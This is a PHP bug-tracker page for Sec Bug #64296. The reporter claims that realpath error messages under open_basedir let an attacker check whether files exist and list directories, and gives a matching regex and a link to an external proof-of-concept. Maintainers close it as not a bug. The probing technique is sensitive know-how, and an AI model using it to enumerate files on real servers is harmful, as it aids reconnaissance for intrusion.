PHP :: Sec Bug #64296 :: PHP Realpath Directory Listing

Sec Bug #64296	PHP Realpath Directory Listing
Submitted:	2013-02-25 13:35 UTC	Modified:	2021-05-20 12:18 UTC
From:	security at hoax dot io	Assigned:	cmb (profile)
Status:	Not a bug	Package:	Safe Mode/open_basedir
PHP Version:	Irrelevant	OS:	*NIX & WIN
Private report:	No	CVE-ID:	None

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	security at hoax dot io
New email:
PHP Version:		OS:

New Comment:

[2013-02-25 13:35 UTC] security at hoax dot io

Description:
------------
Realdir is quite verbose, thus allowing attackers to check if files and folders 
exist using the following Regex "$regexp = "/File\((.*)\) is not within/";"

This has been tested on:
5.4.11 & Above

For a Full PoC please check the Test Script


Test script:
---------------
http://pastebin.com/4LTrARUj


Expected result:
----------------
The Directory List of /

Actual result:
--------------
The Directory List of /

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2013-03-05 18:37 UTC] johannes@php.net

This is not specific to realpath but applies to most/all functions which are affected by open_basedir. I don't think open_basedir should or can provide full secrecy. Doing that is the role of the operating system (file system access rights, chroot, ...). The purpose of open_basedir is, in my opinion, more a safety net than a top security feature.

Leaving this open for others to comment, though.

[2013-03-06 09:33 UTC] security at hoax dot io

Why should open_dir be treated as a safety net?

If a 'end user' can bypass the safety function of open_dir and Safe Mode it should 
be  fixed right,

[2021-05-20 12:18 UTC] cmb@php.net

-Status: Open +Status: Not a bug -Assigned To: +Assigned To: cmb

[2021-05-20 12:18 UTC] cmb@php.net

If an attacker can run arbitrary scripts, all bets are off.  We do
not classify that as security issue[1].  And having detailed info
regarding the file names in the error log, or on screen during
development is a useful feature, not a bug.

[1] <https://wiki.php.net/security#not_a_security_issue>

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Thu Dec 26 19:01:30 2024 UTC